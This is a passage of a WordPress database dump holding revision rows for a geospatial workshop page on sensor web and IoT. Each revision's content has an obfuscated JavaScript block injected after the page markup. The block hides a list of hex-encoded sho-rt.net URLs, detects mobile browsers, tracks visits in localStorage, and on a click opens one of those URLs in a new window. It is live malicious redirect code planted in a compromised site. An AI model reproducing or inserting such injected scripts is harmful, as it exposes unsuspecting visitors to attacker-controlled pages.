_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:15:55','2022-12-06 05:15:55','',3386,'https://gsw2023.com/?p=3417',0,'revision','',0),
(3418,1,'2022-12-06 05:16:11','2022-12-06 05:16:11','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"12x10\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:16:11','2022-12-06 05:16:11','',3386,'https://gsw2023.com/?p=3418',0,'revision','',0),
(3419,1,'2022-12-06 05:16:30','2022-12-06 05:16:30','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 